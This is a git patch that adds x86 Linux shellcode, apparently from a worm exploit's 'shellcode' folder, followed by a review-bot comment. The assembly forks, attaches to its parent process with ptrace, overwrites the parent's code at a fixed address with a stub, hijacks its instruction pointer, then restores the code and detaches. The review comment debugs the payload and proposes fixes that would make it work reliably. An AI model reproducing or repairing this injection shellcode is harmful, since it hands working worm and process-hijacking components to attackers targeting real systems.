From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial
---
exploits/7350wurm/shellcode/bambam.s | 230 +++++++++++++++++++++++++++++++++++
1 file changed, 230 insertions(+)
create mode 100644 exploits/7350wurm/shellcode/bambam.s
(limited to 'exploits/7350wurm/shellcode/bambam.s')
diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s
new file mode 100644
index 0000000..5719ed7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
+
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+/* getppid */
+ pushl $64
+ popl %eax
+ int $0x80
+/* movl %eax, %ecx */
+ pushl %eax
+ xchgl %ebp, %eax
+
+/* z_fork */
+ pushl $2
+ popl %eax
+ int $0x80
+ or %eax, %eax
+ je fchild
+
+ /* waitpid (pid, NULL, 0) */
+ pushl $7
+ popl %esi
+ xchgl %esi, %eax /* eax = 7, esi = ppid */
+ xorl %ecx, %ecx
+ xorl %edx, %edx
+ int $0x80
+
+ xorl %eax, %eax
+ movb $162, %al
+ pushl $10
+ pushl $10
+ movl %esp, %ebx
+ movl %esp, %ecx
+ int $0x80
+ui:
+jmp ui
+ /* exit */
+fexit:
+
+ pushl $1
+ popl %eax
+ xorl %ebx, %ebx
+ int $0x80
+
+/*** CHILD ***/
+fchild: pushl $2 /* second fork */
+ popl %eax
+ int $0x80
+
+ or %eax, %eax
+ jne fexit
+
+ popl %ecx /* parent process pid */
+/* ptrace attach */
+ pushl $26
+ popl %eax
+ cdq
+ pushl $16
+ popl %ebx
+ xorl %esi, %esi
+ int $0x80
+
+/* ptrace peekdata */
+ movl $0x08048210, %edx
+/* movl $0xbf7ff010, %edx */
+ movl $0xbffff010, %esi
+ pushl $127
+ popl %edi
+loopa:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $2
+ popl %ebx
+ pushl %edi
+ int $0x80
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopa
+
+/* ptrace getregs */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $12
+ popl %ebx
+ pusha
+ movl %esp, %esi
+ int $0x80
+
+/* ptrace setregs */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $13
+ popl %ebx
+ movl %esp, %esi
+ movl 48(%esi), %edi
+ pushl %edi
+ movl $0x08048210, 48(%esi)
+/* movl $0xbf7ff010, 48(%esi)*/
+ int $0x80
+
+ jmp pointX
+pointY:
+
+ popl %esi
+ movl $0x08048210, %edx
+ pushl $20
+ popl %edi
+loopc:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ pushl %edi
+ pushl %esi
+ movl (%esi), %esi
+ int $0x80
+ popl %esi
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopc
+
+
+/* ptrace pokedata */
+/* movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ movl $0xccccfeeb, %esi*/
+/* movl $0xbf7ff010, %edx*/
+ movl $0x08048210, %edx
+/* int $0x80*/
+
+/*ptrace cont */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ cdq
+ pushl $7
+ popl %ebx
+ xorl %esi, %esi
+ int $0x80
+
+/* wait 4 */
+/* 0 on return */
+ cdq
+ movl %eax, %ebx
+ decl %ebx
+ movl %eax, %ecx
+ movb $114, %al
+ int $0x80
+
+/* ptrace pokedata */
+ movl $0x08048210, %edx
+ movl $0xbffff010, %esi
+/* movl $0xbf7ff010, %edx*/
+ pushl $127
+ popl %edi
+loopb:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ pushl %edi
+ pushl %esi
+ movl (%esi), %esi
+ int $0x80
+ popl %esi
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopb
+
+/* ptrace setregs */
+ popl %edi
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $13
+ popl %ebx
+ movl %esp, %esi
+ movl %edi, 48(%esi)
+ int $0x80
+
+
+/* ptrace detach */
+ movl %ebp, %ecx
+ pushl $17
+ popl %ebx
+ pushl $26
+ popl %eax
+ cdq
+ movl %edx, %esi
+ int $0x80
+/* exit */
+ xorl %ecx, %ecx
+ incl %esi
+ xchgl %esi, %eax
+ int $0x80
+pointX:
+ call pointY
+
+ pushl $2 /* second fork */
+ popl %eax
+ int $0x80
+ or %eax, %eax
+ je pointA
+ int $0x3
+pointA:
+ jmp pointA
+
+
+
+
+
+cend:
+
+
-- cgit v1.3
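Review bot: The waitpid in the first-fork parent path never loads its pid argument: `pushl $7 / popl %esi / xchgl %esi, %eax` leaves the forked child's pid in %esi and the syscall number in %eax, but %ebx — the pid argument for int $0x80 — is not written anywhere between cbegin and that syscall, so it waits on whatever %ebx held when the hijacked process reached the shellcode (the inline comment "esi = ppid" also mislabels both the register's role and its value). Replacing those three lines with `movl %eax, %ebx`, `pushl $7`, `popl %eax` passes the child's pid as the comment intends. Separately, the PTRACE_ATTACH int $0x80 is followed directly by the loopa PEEKDATA loop with no wait on the tracee; on the kernels this targets a ptrace request against a tracee that has not yet stopped is presumably refused with ESRCH, and since no int $0x80 return value is checked anywhere, a failed save would go unnoticed and loopb would later poke garbage back into the parent — worth confirming and adding a wait4 on %ebp's pid right after attach. The literals 0x08048210 and 0xbffff010 recur in loopa, the setregs eip store, loopc and loopb with no explanation; a comment at the first use such as `/* 0x08048210: text address in the traced parent that is saved, overwritten with the fork stub and restored; 0xbffff010: local scratch holding the saved words */` would make the flow readable.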